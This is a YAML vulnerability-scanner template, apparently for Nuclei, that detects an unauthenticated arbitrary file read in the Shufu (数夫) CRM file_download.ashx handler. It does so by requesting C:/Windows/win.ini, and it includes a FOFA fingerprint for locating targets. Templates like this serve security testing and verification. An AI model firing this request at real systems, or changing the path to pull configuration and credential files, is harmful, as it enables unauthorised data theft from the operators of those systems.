http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Web/common/Handler/file_download.ashx?filepath=C:/Windows/win.ini HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: shufuCRM-file_download_ashx-File-reading
info:
    author: Superhero
    description: |-
        fofa: icon_hash="-244202779"
        数夫CRM客户关系管理系统  file_download.ashx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 数夫CRM客户关系管理系统  file_download.ashx 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/KAoN4xOubT3mHQyTpbNRtw
    severity: high
    tags:
        - File reading
